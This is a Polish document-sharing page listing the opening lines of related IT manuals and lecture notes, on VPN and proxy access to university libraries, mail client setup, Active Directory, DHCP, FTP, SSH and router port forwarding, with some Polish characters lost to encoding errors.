Aby móc korzystać z bazy publikacji elektronicznych należy: 1) posiadać konto w usłudze LDAP (konto logowania do Internetu), 2) zainstalować i skonfigurować oprogramowanie OpenVPN na swoim komputerze,
Bardziej szczegółowoInstrukcja obsługi programu Pilot PS 5rc
Instrukcja obsługi programu Pilot PS 5rc Spis treci 1.Wprowadzenie....3 2. Wymagania....3 3. Instalacja oprogramowania...3 4. Uruchomienie Programu...5 4.1. Menu główne...5 4.2. Zakładki...6 5. Praca z
Bardziej szczegółowoInstrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.
Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Spis treści 1. Konfiguracja poczty Exchange dla klienta pocztowego Outlook 2007 protokół Exchange
Bardziej szczegółowoDLA DREAMBOX & FLASHWIZARD
INSTALACJA I KONFIGURACJA NFS SERVER DLA DREAMBOX & FLASHWIZARD z wykorzystaniem MS Services for Unix Wymagania: Windows 2000 lub XP Professional System plików NTFS Pliki Passwd & Group które kopiujemy
Bardziej szczegółowoWINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.
WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy
Bardziej szczegółowoWykonać Ćwiczenie: Active Directory, konfiguracja Podstawowa
Wykonać Ćwiczenie: Active Directory, konfiguracja Podstawowa Instalacja roli kontrolera domeny, Aby zainstalować rolę kontrolera domeny, należy uruchomić Zarządzenie tym serwerem, po czym wybrać przycisk
Bardziej szczegółowoInstalacja i konfiguracja Symfonia.Common.Server oraz Symfonia.Common.Forte
Instalacja i konfiguracja Symfonia.Common.Server oraz Symfonia.Common.Forte Instalacja Symfonia.Common.Server 0 2 Spis treści Spis treści 2 Instalacja Symfonia.Common.Server 3 Ważne zalecenia... 3 Konfiguracja
Bardziej szczegółowo4CMSystem. Podrcznik uytkownika. Strona projektu: http://cms.4proweb.net. Realizacja projektu: 2004 2005
4CMSystem Podrcznik uytkownika Stworzone przez grup 4proweb.net Strona projektu: http://cms.4proweb.net Realizacja projektu: 2004 2005 Programista, administrator Marcin Iwaniec, miwaniec@4proweb.net Autor
Bardziej szczegółowoInstrukcja instalacji usługi Sygnity Service
Instrukcja instalacji usługi Sygnity EmailService Usługa Sygnity EmailService jest przeznaczona do wysyłania wiadomości pocztą elektroniczną do klientów zarejestrowanych w Systemach Dziedzinowych Sygnity
Bardziej szczegółowoTwoja instrukcja użytkownika HP PAVILION DV6-1215SA
Możesz przeczytać rekomendacje w przewodniku, specyfikacji technicznej lub instrukcji instalacji dla HP PAVILION DV6-1215SA. Znajdziesz odpowiedź na wszystkie pytania w instrukcji dla HP PAVILION DV6-1215SA
Bardziej szczegółowoTomasz Greszata - Koszalin
T: Usługi serwerowe w systemie Windows - telnet. Zadanie1: Sprawdź informacje w serwisie Wikipedii na temat usługi telnet. Telnet standard protokołu komunikacyjnego używanego w sieciach komputerowych do
Bardziej szczegółowoInstrukcja instalacji usługi Sygnity SmsService
Instrukcja instalacji usługi Sygnity SmsService Usługa Sygnity SmsService jest przeznaczone do wysyłania wiadomości tekstowych na telefony klientów zarejestrowanych w Systemach Dziedzinowych Sygnity wykorzystywanych
Bardziej szczegółowoWzorcowy załcznik techniczny, do umowy w sprawie przesyłania faktur elektronicznych pomidzy Firm A oraz Firm B
Wzorcowy załcznik techniczny, do umowy w sprawie przesyłania faktur elektronicznych pomidzy Firm A oraz Firm B Wersja draft 2.1 Na podstawie: Europejskiej Modelowej Umowy o EDI (w skrócie: EMUoE). 1. Standardy
Bardziej szczegółowoZdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego
Rzeszów, 2012-04-03 Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego 1. Obsługiwane przeglądarki internetowe...2 2. Uwagi odnośnie serwerów proxy...2 3.
Bardziej szczegółowoINSTRUKCJA INSTALACJI I PIERWSZEGO URUCHOMIENIA APLIKACJI Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy
INSTRUKCJA INSTALACJI I PIERWSZEGO URUCHOMIENIA APLIKACJI Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy Instalacja systemu Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy System Rodzajowa Ewidencja
Bardziej szczegółowoUsługi sieciowe systemu Linux
Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do
Bardziej szczegółowoPracownia internetowa w każdej szkole (edycja Jesień 2007)
Instrukcja numer D1/02_04/D5 Pracownia internetowa w każdej szkole (edycja Jesień 2007) Opiekun pracowni internetowej cz. 1 (D1) Dostęp do grup dyskusyjnych na szkolnym serwerze Jak skonfigurować dostęp
Bardziej szczegółowoInstrukcja Obsugi Programu
sprawozdania jednostkowe Instrukcja Obsugi Programu cz administracyjna ód 2004 Spis treci 1. Jak zainstalowa program Budet JB Plus?... 2 1.1 Pena instalacja... 2 1.2 Aktualizacja... 3 1.3 Odinstalowanie
Bardziej szczegółowoZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja
ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.
Bardziej szczegółowoINSTRUKCJA INSTALACJI SYSTEMU
Zarządzanie Procesami Informatycznymi Sp. z o.o. 54-204 Wrocław, ul. Legnicka 62 Tel. : ( 071 ) 354 88 88 Fax : ( 071 ) 354 88 99 E-mail : biuro@vilico.pl INSTRUKCJA INSTALACJI SYSTEMU Wersja 1.4-1 - Spis
Bardziej szczegółowoKompilacja image z CVS
Kompilacja image z CVS Tworzenie image na Dreamboxa nie jest tajemnic, a opis czynnoci, jakie naley wykona, aby stworzy własny soft mona znale na wikszoci niemieckich stron traktujcych o Dreamboxach. Kto
Bardziej szczegółowoPracownia internetowa w każdej szkole (edycja jesień 2005)
Instrukcja numer SPD3/12_02/Z Pracownia internetowa w każdej szkole (edycja jesień 2005) Opiekun pracowni internetowej cz. 3 Instalacja programu phpmyadmin (PD3) Zadanie 1 Program phpmyadmin jest jednym
Bardziej szczegółowoInstalacja Altium Designer Powizane wideo Altium Designer - Installation and Management
Instalacja Altium Designer Powizane wideo Altium Designer - Installation and Management Nadrzdny artyku: Pierwsze kroki z Altium Designer Podstawow metod instalacji Altium Designer (od wersji Altium Designer
Bardziej szczegółowoPakiet informacyjny dla nowych użytkowników usługi Multimedia Internet świadczonej przez Multimedia Polska S.A. z siedzibą w Gdyni
Pakiet informacyjny dla nowych użytkowników usługi Multimedia Internet świadczonej przez Multimedia Polska S.A. z siedzibą w Gdyni Rozdział I Konfiguracja komputera do pracy w sieci Multimedia w systemie
Bardziej szczegółowoZastosowanie programu Microsoft Excel do analizy wyników nauczania
Grayna Napieralska Zastosowanie programu Microsoft Excel do analizy wyników nauczania Koniecznym i bardzo wanym elementem pracy dydaktycznej nauczyciela jest badanie wyników nauczania. Prawidłow analiz
Bardziej szczegółowoWindows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK. I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej)
Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej) Uruchom maszynę wirtualną Server 2008 Zaloguj się do konta
Bardziej szczegółowoZanim zaczniesz. Warto ustawić kartę sieciową naszego serwera.
Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera. Wchodzimy w Centrum sieci -> Połączenia sieciowe -> następnie do właściwości naszej karty sieciowej. Następnie przechodzimy do Protokół internetowy
Bardziej szczegółowoInstrukcja dla pracowników Uniwersytetu Rzeszowskiego.
Dost p!do!infrastruktury!informatycznej. Instrukcja dla pracowników Uniwersytetu Rzeszowskiego. Wersja dokumentu: 1.0.0 Rzeszów: 23.10.2009 OPTeam S.A. 35-032 Rzeszów, ul. Lisa Kuli 3 INFORMACJA O NOWYCH
Bardziej szczegółowoKlient poczty elektronicznej - Thunderbird
Klient poczty elektronicznej - Thunderbird Wstęp Wstęp Klient poczty elektronicznej, to program który umożliwia korzystanie z poczty bez konieczności logowania się na stronie internetowej. Za jego pomocą
Bardziej szczegółowoInstalacja i konfiguracja serwera IIS z FTP
Instalacja i konfiguracja serwera IIS z FTP IIS (Internet Information Services) jest to usługa dostępna w systemach z rodziny Windows Server, pozwalająca na obsługę i utrzymanie własnych stron WWW oraz
Bardziej szczegółowoWskazówki do instalacji Systemu Symfonia Forte. Szybki start
Wskazówki do instalacji Systemu Symfonia Forte Szybki start Powielanie w jakiejkolwiek formie całości lub fragmentów podręcznika bez pisemnej zgody firmy Sage Symfonia Sp. z o.o. jest zabronione. Copyright
Bardziej szczegółowoBiuletyn techniczny. CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych. Copyright 2007 COMARCH SA
Biuletyn techniczny CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych Copyright 2007 COMARCH SA 1 Spis treści 1 SPIS TREŚCI... 2 2 DRUKARKI FISKALNE W USŁUGACH TERMINALOWYCH... 3 2.1 2.2 INSTALACJA
Bardziej szczegółowoOBSŁUGA I KONFIGURACJA SIECI W WINDOWS
OBSŁUGA I KONFIGURACJA SIECI W WINDOWS Jak skonfigurować komputer pracujący pod kontrolą systemu operacyjnego Windows 7, tak aby uzyskać dostęp do internetu? Zakładamy, że komputer pracuje w małej domowej
Bardziej szczegółowoPoradnik cz.1 Użycie połączenia SSH
Poradnik cz.1 Użycie połączenia SSH W niniejszej części pokażę jak zalogować się na serwer w trybie graficznym. Protokół SSH służy do komunikowania się między klientem a serwerem. Jest to ulepszona wersja
Bardziej szczegółowoZadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat usługi DHCP.
T: Konfiguracja usługi DHCP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat usługi DHCP. DHCP (ang. Dynamic Host Configuration Protocol) protokół komunikacyjny
Bardziej szczegółowoDostp do zasobów dyskowych uytkowników lcme10 przez protokół SMB (Microsoft Networking)
Dostp do zasobów dyskowych uytkowników lcme10 przez protokół SMB (Microsoft Networking) Powered by: Od 20 stycznia 2003 roku wszyscy u ytkownicy serwera lcme10, posiadajcy konta w domenie SE-AD Instytutu
Bardziej szczegółowo1 Implementowanie i konfigurowanie infrastruktury wdraŝania systemu Windows... 1
Spis treści Wstęp... xi Wymagania sprzętowe (Virtual PC)... xi Wymagania sprzętowe (fizyczne)... xii Wymagania programowe... xiii Instrukcje instalowania ćwiczeń... xiii Faza 1: Tworzenie maszyn wirtualnych...
Bardziej szczegółowoSIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja
SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja Instytut Telekomunikacji Wydział Elektroniki i Technik Informacyjnych Politechnika Warszawska, marzec 2015 Wprowadzenie Ćwiczenie jest wykonywane
Bardziej szczegółowoPRZYKŁAD ROZWIZANIA ZADANIAZ INFORMATORA DO ETAPU PRAKTYCZNEGO EGZAMINU W ZAWODZIE TECHNIK INFORMATYK
PRZYKŁAD ROZWIZANIA ZADANIAZ INFORMATORA DO ETAPU PRAKTYCZNEGO EGZAMINU W ZAWODZIE TECHNIK INFORMATYK 1. Tytuł pracy egzaminacyjnej Opracowanie projektu realizacji prac prowadzcych do lokalizacji i usunicia
Bardziej szczegółowoZdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego
Rzeszów, 2017-10-12 Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego 1. Obsługiwane przeglądarki internetowe... 2 2. Uwagi odnośnie serwerów proxy... 2
Bardziej szczegółowoKORZYSTANIE Z BAZY DANYCH UpToDate
KORZYSTANIE Z BAZY DANYCH UpToDate 1 KORZYSTANIE Z BAZY DANYCH UpToDate 1. Wejdź na stronę Biblioteki Głównej Uniwersytetu Medycznego w Lublinie: http://www.biblioteka.umlub.pl 2. W ZASOBY kliknij na Zdalny
Bardziej szczegółowoAutorzy: Kraków, stycze 2007 Łukasz Dziewanowski Filip Haftek (studenci AGH III roku kierunku Automatyka i Robotyka)
Autorzy: Kraków, stycze 2007 Łukasz Dziewanowski Filip Haftek (studenci AGH III roku kierunku Automatyka i Robotyka) PROGRAM DO OBSŁUGI TELEFONU KOMÓRKOWEGO I. Instalacja: MOLIWOCI POŁCZENIA TELEFONU Z
Bardziej szczegółowoInstrukcja instalacji usługi Sygnity SmsService
Instrukcja instalacji usługi Sygnity SmsService Usługa Sygnity SmsService jest przeznaczone do wysyłania wiadomości tekstowych na telefony klientów zarejestrowanych w Systemach Dziedzinowych Sygnity wykorzystywanych
Bardziej szczegółowoErrata. Instalacja sklepu internetowego
Errata. Instalacja sklepu internetowego Aplikacja sklepu internetowego została napisana i przetestowana w rodowisku PHP 4 oraz MySQL 4.0. Poniewa jednak na płycie CD-ROM dołczonej do ksiki znajduje si
Bardziej szczegółowoWindows Server Active Directory
Windows Server 2012 - Active Directory Active Directory (AD) To usługa katalogowa a inaczej mówiąc hierarchiczna baza danych, która przynajmniej częściowo musi być ściśle związana z obiektową bazą danych.
Bardziej szczegółowoInstrukcja instalacji i konfiguracji Karty EDGE/GPRS SonyEricsson GC85
Instrukcja instalacji i konfiguracji Karty EDGE/GPRS SonyEricsson GC85 SPIS TREŚCI SPIS TREŚCI...2 WSTĘP...2 INSTRUKCJA INSTALACJI I KONFIGURACJI...3 SCHEMAT INSTALACJI KARTY SIM W SE GC85...3 INSTALACJA
Bardziej szczegółowoZdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego
Rzeszów, 2015-10-21 Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego 1. Obsługiwane przeglądarki internetowe...2 2. Uwagi odnośnie serwerów proxy...2 3.
Bardziej szczegółowoPlanowanie adresacji IP dla przedsibiorstwa.
Planowanie adresacji IP dla przedsibiorstwa. Wstp Przy podejciu do planowania adresacji IP moemy spotka si z 2 głównymi przypadkami: planowanie za pomoc adresów sieci prywatnej przypadek, w którym jeeli
Bardziej szczegółowoProblemy techniczne SQL Server
Problemy techniczne SQL Server Co zrobić, jeśli program Optivum nie łączy się poprzez sieć lokalną z serwerem SQL? Programy Optivum, które korzystają z bazy danych umieszczonej na serwerze SQL, mogą być
Bardziej szczegółowoMicrosoft Authenticode. Uycie certyfikatów niekwalifikowanych do podpisywania kodu w technologii MS Authenticode. wersja 1.1 UNIZETO TECHNOLOGIES SA
Microsoft Authenticode Uycie certyfikatów niekwalifikowanych do podpisywania kodu w technologii MS Authenticode wersja 1.1 Spis treci 1. WSTP... 3 2. TWORZENIE KLUCZA PRYWATNEGO I CERTYFIKATU... 3 3. INSTALOWANIE
Bardziej szczegółowo9. Internet. Konfiguracja połączenia z Internetem
9. Internet Ćwiczenia zawarte w tym rozdziale pozwolą na bezpieczne podłączenie komputera (lub całej sieci lokalnej) do Internetu. Firma Microsoft nie zrezygnowała z umieszczania w systemie przeglądarki
Bardziej szczegółowoSYSTEM PROXY. Zdalny dostęp do zasobów elektronicznych BGiOINT Politechniki Wrocławskiej
SYSTEM PROXY Zdalny dostęp do zasobów elektronicznych BGiOINT Politechniki Wrocławskiej 1. Przeglądarki internetowe obsługujące system proxy 2 2. Uwagi na temat serwerów proxy 2 3. Konfiguracja przeglądarki
Bardziej szczegółowoStudium przypadku Case Study CCNA2-ROUTING
Na podstawie oryginału CISCO, przygotował: mgr in. Jarosław Szybiski Studium przypadku Case Study CCNA2-ROUTING Ogólne załoenia dla projektu Przegld i cele Podczas tego wiczenia uczestnicy wykonaj zadanie
Bardziej szczegółowoPrzykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional)
Przykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional) KROK NR 1: Uruchamiamy program Outlook Express. Jesteśmy proszeni o nazwę tożsamości.
Bardziej szczegółowoJak wykorzystać Pulpit Zdalny w Windows 2003 Serwer do pracy z programem FAKT
Jak wykorzystać Pulpit Zdalny w Windows 2003 Serwer do pracy z programem FAKT Planując uruchomienie programu FAKT na wielu stanowiskach w sieci możemy wykorzystać możliwości oprogramowania Windows Serwer
Bardziej szczegółowoSystem Connector Opis wdrożenia systemu
System Connector Opis wdrożenia systemu Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Spistre ci Wymagania z perspektywy Powiatowego Urzdu Pracy... 3
Bardziej szczegółowo10.2. Udostępnianie zasobów
Rozdział 10 t Praca w sieci równoprawnej Aby komputer mógł być widoczny wśród innych w otoczeniu sieciowym, musi mieć unikalną nazwę i przynależeć do grupy roboczej. Ustawienia te dostępne są poprzez aplet
Bardziej szczegółowoProgram kadrowo płacowy - wersja wielodostępna z bazą danych Oracle SQL Server 8 lub 9
Program kadrowo płacowy - wersja wielodostępna z bazą danych Oracle SQL Server 8 lub 9 Uwaga: Masz problem z programem lub instalacją? Nie możesz wykonać wymaganej czynności? Daj nam znać. W celu uzyskania
Bardziej szczegółowoPrzekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej:
Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Router jest podłączony do sieci Internet, natomiast od dostawcy
Bardziej szczegółowoPrzekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek
Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Router jest podłączony do sieci Internet, natomiast od dostawcy zostaje
Bardziej szczegółowoZdalny dostęp do zasobów elektronicznych BGiOINT dla pracowników Politechniki Wrocławskiej
Wrocław, 2010-09-23 Zdalny dostęp do zasobów elektronicznych BGiOINT dla pracowników Politechniki Wrocławskiej 1 Obsługiwane przeglądarki internetowe 2 2 Uwagi odnośnie serwerów proxy 2 3 Konfiguracja
Bardziej szczegółowoINSTALACJA LICENCJI SIECIOWEJ NET HASP Wersja 8.32
INSTALACJA LICENCJI SIECIOWEJ NET HASP Wersja 8.32 Spis Treści 1. Wymagania... 2 1.1. Wymagania przy korzystaniu z klucza sieciowego... 2 1.2. Wymagania przy uruchamianiu programu przez internet... 2 2.
Bardziej szczegółowoPraca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce WWW
Instytut Sterowania i Systemów Informatycznych Uniwersytet Zielonogórski Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce
Bardziej szczegółowoInstrukcje dotyczące systemu Windows w przypadku drukarki podłączonej lokalnie
Strona 1 z 6 Połączenia Instrukcje dotyczące systemu Windows w przypadku drukarki podłączonej lokalnie Uwaga: Przy instalowaniu drukarki podłączonej lokalnie, jeśli dysk CD-ROM Oprogramowanie i dokumentacja
Bardziej szczegółowoZadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp.
T: Konfiguracja usługi ftp w systemie Windows 8.1. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. FTP (ang. File Transfer Protocol) protokół transferu plików umożliwiający
Bardziej szczegółowoPrzed instalacj naley sprawdzi wersj posiadanych sterowników urzdzenia. Powinna by nie starsza ni:
Instalacja karty TechniSat Sky Star 2 Przed instalacj naley sprawdzi wersj posiadanych sterowników urzdzenia. Powinna by nie starsza ni: DriverVer = 07/08/2003 4.2.8.9999 Po zainstalowaniu karty na złczu
Bardziej szczegółowoKancelaria Prawna.WEB - POMOC
Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV
Bardziej szczegółowo